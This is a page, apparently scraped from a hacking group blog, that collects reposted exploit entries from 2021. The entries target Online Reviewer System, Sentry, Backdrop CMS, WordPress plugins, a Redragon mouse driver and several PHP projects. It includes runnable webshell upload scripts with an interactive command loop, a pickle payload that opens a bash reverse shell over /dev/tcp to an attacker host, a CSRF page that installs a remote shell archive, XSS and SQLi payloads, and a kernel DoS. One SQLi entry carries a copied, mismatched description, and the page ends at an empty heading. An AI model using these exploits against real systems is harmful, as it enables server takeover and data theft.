# Exploit Title: Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja
# Date: 2021-09-21
# Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/reviewer_0.zip
# Version: 1.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Online Reviewer System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
# RCE via executing exploit:
# Step 1: run the exploit in python with this command: python3 ORS_v1.0.py
# Step 2: Input the URL of the vulnerable application: Example: http://localhost/reviewer/
import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
print(Style.BRIGHT+" Online Reviewer System 1.0")
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)
print(r"""
______ _______ ________
___ //_/__ /_______ ___ _______ ______(_)_____ _
__ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/
_ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ /
/_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/
/___/
abdullahkhawaja.com
""")
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
#Create a new session
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
LINK=input("Enter URL of The Vulnarable Application : ")
def webshell(LINK, session):
try:
WEB_SHELL = LINK+'/system/system/admins/assessments/databank/files/'+filename
getdir = {'cmd': 'echo %CD%'}
r2 = session.get(WEB_SHELL, params=getdir, verify=False)
status = r2.status_code
if status != 200:
print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
r2.raise_for_status()
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
cwd = re.findall('[CDEF].*', r2.text)
cwd = cwd[0]+"> "
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
while True:
thought = input(term)
command = {'cmd': thought}
r2 = requests.get(WEB_SHELL, params=command, verify=False)
status = r2.status_code
if status != 200:
r2.raise_for_status()
response2 = r2.text
print(response2)
except:
print("\r\nExiting.")
sys.exit(-1)
#Creating a PHP Web Shell
phpshell = {
'personImage':
(
'kh4waja.php',
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',
'application/octet-stream',
{'Content-Disposition': 'form-data'}
)
}
# Defining value for form data
data = {'difficulty_id':'1', 'test_desc':'CIVIL ENGINEERING', 'test_desc':'CIVIL ENGINEERING', 'test_subject':'Mathematics, Surveying and Transportation Engineering', 'description':'Hello World', 'option_a':'a', 'option_b':'b', 'option_c':'c', 'option_d':'d', 'answer':'A', 'btnAddQuestion':'Save' }
filename = 'kh4waja.php'
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'system/system/admins/assessments/databank/btn_functions.php?action=add', cookies=cookies, files=phpshell, data=data)
shell_upload = True if("" in upload.text) else False
u=shell_upload
if u:
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
#Executing The Webshell
webshell(LINK, s)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863134168
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 22/09/2021
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vulnerability Discovered By : Clement Berthaux (SYNACKTIV)
# Software Link: https://sentry.io/welcome/
# Advisory: https://doc.lagout.org/Others/synacktiv_advisory_sentry_pickle.pdf
# Tested on: Sentry 8.0.0
# Fixed Versions : 8.1.4 , 8.2.2
# NOTE : Only exploitable by a user with Superuser privileges.
# Example Usage : https://imgur.com/a/4w5rH5s
import requests
import re
import warnings
from bs4 import BeautifulSoup
import sys
import base64
import urllib
import argparse
import os
import time
from cPickle import dumps
import subprocess
from base64 import b64encode
from zlib import compress
from shlex import split
from datetime import datetime
parser = argparse.ArgumentParser(description='Sentry < 8.2.2 Authenticated RCE')
parser.add_argument('-U',help='Sentry Admin Username / Email')
parser.add_argument('-P',help='Sentry Admin Password')
parser.add_argument('-l',help='Rev Shell LHOST')
parser.add_argument('-p',help='Rev Shell LPORT ',type=int)
parser.add_argument('--url',help='Sentry Login URL ')
args = parser.parse_args()
username = args.U
password = args.P
lhost = args.l
lport = args.p
sentry_url = args.url
# Generate Payload
class PickleExploit(object):
def __init__(self, command_line):
self.args = split(command_line)
def __reduce__(self):
return (subprocess.Popen, (self.args,))
rev_shell = '/bin/bash -c "bash -i >& /dev/tcp/%s/%s 0>&1"' %(lhost,lport)
payload = b64encode(compress(dumps(PickleExploit(rev_shell))))
print("\r\n[+] Using Bash Reverse Shell : %s" %(rev_shell))
print("[+] Encoded Payload : %s" %(payload))
# Perform Exploitation
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
request = requests.Session()
print("[+] Retrieving CSRF token to submit the login form")
print("[+] URL : %s" %(sentry_url))
time.sleep(1)
page = request.get(sentry_url)
html_content = page.text
soup = BeautifulSoup(html_content,features="lxml")
token = soup.findAll('input')[0].get("value")
print("[+] CSRF Token : "+token)
time.sleep(1)
#Login
proxies = {
"http" : "http://127.0.0.1:8080",
"https" : "https://127.0.0.1:8080",
}
login_info ={
"csrfmiddlewaretoken": token,
"op": "login",
"username": username,
"password": password
}
login_request = request.post(sentry_url,login_info)
if login_request.status_code==200:
print("[+] Login Successful")
time.sleep(1)
else:
print("Login Failed")
print(" ")
sys.exit()
#get admin page
split_url = sentry_url.split("/")[2:]
main_url = "http://"+split_url[0]
audit_url = main_url+"/admin/sentry/auditlogentry/add/"
#request auditpage
date = datetime.today().strftime('%Y-%m-%d')
time = datetime.today().strftime('%H:%M:%S')
exploit_fields = {
"csrfmiddlewaretoken" : request.cookies['csrf'],
"organization" : "1",
"actor_label" : "root@localhost",
"actor" : "1",
"actor_key" : " ",
"target_object" : "2",
"target_user" : " ",
"event" : "31",
"ip_address" : "127.0.0.1",
"data" : payload,
"datetime_0" : date,
"datetime_1" : time,
"initial-datetime_0" : date,
"initial-datetime_1" : time,
"_save" : "Save"
}
print("[+] W00t W00t Sending Shell :) !!!")
stager = request.post(audit_url,exploit_fields)
if stager.status_code==200:
print("[+] Check nc listener!")
else:
print("Something Went Wrong or Not Vulnerable :(")
# Exploit Title: Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)
# Date: 10.06.2021
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://cloudron.io
# Software Link: https://www.cloudron.io/get.html
# Version: 6.3 >
# CVE : CVE-2021-40868
Proof of Concept:
1. Go to https://localhost/login.html?returnTo=
2. Type your payload after returnTo=
3. Fill in the login information and press the sign in button.
# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)
# Date: 2/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/fitness-calculators/
# Version: 1.9.5
# Tested on: Windows 10
# CVE: CVE-2021-24272
1. Description:
The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers.
Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue
2. Proof of Concept:
<form method="post" action="https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water">
<input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]">
<input type="submit" value="Save" name="submit">
</form>
# Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 15/2/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/woo-order-export-lite/
# Version: 3.1.7
# Tested on: Windows 10
# CVE: CVE-2021-24169
1. Description:
This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>
# Exploit Title: Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)
# Date: 27/08/2021
# Exploit Author: Quadron Research Lab
# Version: all version
# Tested on: Windows 10 x64 HUN/ENG Professional
# Vendor: https://www.redragonzone.com/pages/download
# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/REDRAGON_MOUSE
import ctypes, sys
from ctypes import *
import io
from itertools import product
from sys import argv
devicename = "REDRAGON_MOUSE"
ioctl = 0x222414
kernel32 = windll.kernel32
hevDevice = kernel32.CreateFileA("\\\\.\\GLOBALROOT\\Device\REDRAGON_MOUSE", 0xC0000000, 0, None, 0x3, 0, None)
if not hevDevice or hevDevice == -1:
print ("Not Win! Sorry!")
else:
print ("OPENED!")
buf = '\x44' * 1000 + '\x00' * 1000
bufLength = 2000
kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)
# Exploit Title: Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/3dprint-lite/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/
# Version: <= 1.9.1.4
# Tested on: Ubuntu 20.04.1
import os.path
from os import path
import json
import requests;
import sys
def print_banner():
print("3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload")
print("Author -> spacehen (www.github.com/spacehen)")
def print_usage():
print("Usage: python3 exploit.py [target url] [php file]")
print("Ex: python3 exploit.py https://example.com ./shell.php")
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("jsonrpc" in raw):
return True;
else:
return False;
def main():
print_banner()
if(len(sys.argv) != 3):
print_usage();
sys.exit(1);
base = sys.argv[1]
file_path = sys.argv[2]
ajax_action = 'p3dlite_handle_upload'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
files = {'file' : open(file_path)}
print("Uploading Shell...");
response = requests.post(uri, files=files)
file_name = path.basename(file_path)
if(file_name in response.text):
print("Shell Uploaded!")
if(base[-1] != '/'):
base += '/'
print(base + "wp-content/uploads/p3d/" + file_name);
else:
print("Shell Upload Failed")
sys.exit(1)
main();
# Exploit Title: Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
# Exploit Author: V1n1v131r4
# Date: 2021-09-22
# Vendor Homepage: https://backdropcms.org/
# Software Link: https://github.com/backdrop/backdrop/releases/download/1.20.0/backdrop.zip
# Version: 1.20.0
# Tested On: Kali Linux, Ubuntu 20.04
# Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to add new user with Admin powers.
# Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously add-on with crafted PHP file.
<html>
<body>
<form method="POST" action="http://example.com/backdrop/?q=admin/people/create">
<input type="text" name="q" value="admin/people/create">
<input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">
<input type="text" name="name" value="hacker">
<input type="text" name="mail" value="hacker@hacker.com">
<input type="text" name="notify" value="1">
<input type="text" name="pass" value="admin">
<input type="text" name="form_build_id" value="form-fPIKc40E3Yp2JOBgAd6gFbMJFsihncTANLNRWwPRWIY">
<input type="text" name="form_token" value="AtrGRG9-8zS8-GoKbYL3niPjqnZP2zTirEqB4E_kS9I">
<input type="text" name="form_id" value="user_register_form">
<input type="text" name="status" value="1">
<input type="text" name="roles[administrator]" value="administrator">
<input type="text" name="op" value="Create new account">
<input type="submit" value="Send">
</form>
</body>
</html>
# Step 1
# Send this page below to the victim
<html>
<body>
<form method="POST" action="http://example.com/backdrop/?q=system/ajax">
<input type="text" name="q" value="system/ajax">
<input type="text" name="Backdrop.tableDrag.showWeight" value="0">
<input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">
<input type="text" name="bulk" value="">
<input type="text" name="project_url" value="https://github.com/V1n1v131r4/CSRF-to-RCE-on-Backdrop-CMS/releases/download/backdrop/reference.tar">
<input type="text" name="files[project_upload]" value="">
<input type="text" name="form_build_id" value="form-p-BrvXTDPqUhhAatHFr4d_dQKt6Dn5d-mIf4hwFyuJA">
<input type="text" name="form_token" value="aYigpmZz3OXNHnjJTO2Tu43IXMKyrMXvB2yL-4NFbTw">
<input type="text" name="form_id" value="installer_manager_install_form">
<input type="text" name="_triggering_element_name" value="op">
<input type="text" name="_triggering_element_value" value="Install">
<input type="text" name="ajax_html_ids[]" value="skip-link">
<input type="text" name="ajax_html_ids[]" value="main-content">
<input type="text" name="ajax_html_ids[]" value="installer-browser-filters-form">
<input type="text" name="ajax_html_ids[]" value="edit-search-text">
<input type="text" name="ajax_html_ids[]" value="edit-submit">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-bootstrap_lite">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-corporate_kiss">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lateral">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-colihaut">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-shasetsu">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-borg">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-pelerine">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-cleanish">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-materialize">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lumi">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-tatsu">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-mero">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-snazzy">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-afterlight_tribute">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-minicss">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-zurb_foundation_6">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-thesis">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-summer_fun">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-news_arrow">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-ajax">
<input type="text" name="ajax_html_ids[]" value="title-link">
<input type="text" name="ajax_html_ids[]" value="add-to-queue-link-basis_contrib">
<input type="text" name="ajax_html_ids[]" value="installer-browser-manual-install-link">
<input type="text" name="ajax_html_ids[]" value="edit-link">
<input type="text" name="ajax_html_ids[]" value="admin-bar">
<input type="text" name="ajax_html_ids[]" value="admin-bar-wrapper">
<input type="text" name="ajax_html_ids[]" value="admin-bar-icon">
<input type="text" name="ajax_html_ids[]" value="admin-bar-menu">
<input type="text" name="ajax_html_ids[]" value="admin-bar-extra">
<input type="text" name="ajax_html_ids[]" value="admin-bar-search-items">
<input type="text" name="ajax_html_ids[]" value="ui-id-1">
<input type="text" name="ajax_html_ids[]" value="backdrop-modal">
<input type="text" name="ajax_html_ids[]" value="installer-manager-install-form">
<input type="text" name="ajax_html_ids[]" value="edit-bulk-wrapper">
<input type="text" name="ajax_html_ids[]" value="edit-bulk">
<input type="text" name="ajax_html_ids[]" value="edit-project-url-wrapper">
<input type="text" name="ajax_html_ids[]" value="edit-project-url">
<input type="text" name="ajax_html_ids[]" value="edit-project-upload-wrapper">
<input type="text" name="ajax_html_ids[]" value="edit-project-upload">
<input type="text" name="ajax_html_ids[]" value="edit-actions">
<input type="text" name="ajax_html_ids[]" value="edit-submit--2">
<input type="text" name="ajax_page_state[theme]" value="seven">
<input type="text" name="ajax_page_state[theme_token]" value="RY9h420qjWmejTKFp7C0ytS__FtpWnVmEjVCnHWFblo">
<input type="text" name="ajax_page_state[css][core/misc/normalize.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.theme.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/system/css/messages.theme.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/system/css/system.admin.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/layout/css/grid-flexbox.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/contextual/css/contextual.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/comment/css/comment.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/date/css/date.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/field/css/field.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/search/search.theme.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/user/css/user.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/views/css/views.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar-print.css]" value="1">
<input type="text" name="ajax_page_state[css][core/layouts/boxton/boxton.css]" value="1">
<input type="text" name="ajax_page_state[css][core/modules/installer/css/installer.css]" value="1">
<input type="text" name="ajax_page_state[css][core/themes/seven/css/seven.base.css]" value="1">
<input type="text" name="ajax_page_state[css][core/themes/seven/css/style.css]" value="1">
<input type="text" name="ajax_page_state[css][core/themes/seven/css/responsive-tabs.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/opensans/opensans.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.core.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.button.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.draggable.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.resizable.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.dialog.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/dialog.theme.css]" value="1">
<input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.theme.css]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/html5.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery-extend-3.4.0.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery-html-prefilter-3.5.0.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery.once.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/backdrop.js]" value="1">
<input type="text" name="ajax_page_state[js][core/modules/layout/js/grid-fallback.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ajax.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery.form.js]" value="1">
<input type="text" name="ajax_page_state[js][core/modules/contextual/js/contextual.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/form.js]" value="1">
<input type="text" name="ajax_page_state[js][core/modules/admin_bar/js/admin_bar.js]" value="1">
<input type="text" name="ajax_page_state[js][core/modules/installer/js/installer.project_list.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/progress.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/tableheader.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/dismiss.js]" value="1">
<input type="text" name="ajax_page_state[js][core/themes/seven/js/script.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.data.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.disable-selection.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.labels.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.scroll-parent.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.tabbable.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.unique-id.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.version.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.escape-selector.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.focusable.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form-reset-mixin.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.ie.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.keycode.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.plugin.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-active-element.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-blur.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.widget.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/textarea.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.button.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.mouse.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/jquery.ui.touch-punch.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.draggable.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.position.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.resizable.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.dialog.min.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/dialog.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/dialog.ajax.js]" value="1">
<input type="text" name="ajax_page_state[js][core/misc/collapse.js]" value="1">
<input type="submit" value="Send">
</form>
</body>
</html>
Run on your browser: http://example.com/backdrop/modules/reference/shell.php?cmd=[command] to execute remote commands.
# Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload
# Exploit Author: ()t/\/\1
# Date: 23/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Tested on: Linux
# Version: 2.0
# Exploit Description:
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
# PoC request
POST /expense_budget/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/expense_budget/admin/?page=user
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1399170066243244238234165712
Content-Length: 824
Connection: close
Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="id"
1
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="firstname"
A
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="lastname"
a
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="username"
admin
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="password"
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="img"; filename="na3na3.php"
Content-Type: image/jpeg
<?php echo "<pre>";system($_GET['cmd']); ?>
-----------------------------1399170066243244238234165712--
# Exploit Title: Pharmacy Point of Sale System 1.0 - SQLi Authentication Bypass
# Date: 23.09.2021
# Exploit Author: Janik Wehrli
# Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip
# Version: 1.0
# Tested on: Kali Linux, Windows 10
# Pharmacy Point of Sale System v1.0 Login can be bypassed with a simple SQLi
POST /pharmacy/Actions.php?a=login HTTP/1.1
Host: 192.168.209.170
Content-Length: 38
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.209.170
Referer: http://192.168.209.170/pharmacy/login.php
Accept-Encoding: gzip, deflate
Accept-Language: de-CH,de-DE;q=0.9,de;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: PHPSESSID=c5mtnqpcavhfgsambtnh4uklag
Connection: close
username='OR+1%3D1+--+-&password=PWNED
# Exploit Title: Police Crime Record Management Project 1.0 - Time Based SQLi
# Exploit Author: ()t/\/\1
# Date: 23/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Tested on: Linux
# Version: 1.0
# Exploit Description:
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
The application suffers from an unauthenticated SQL Injection vulnerability.Input passed through 'edit' GET parameter in 'http://127.0.0.1//ghpolice/admin/investigation.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data.
# PoC request
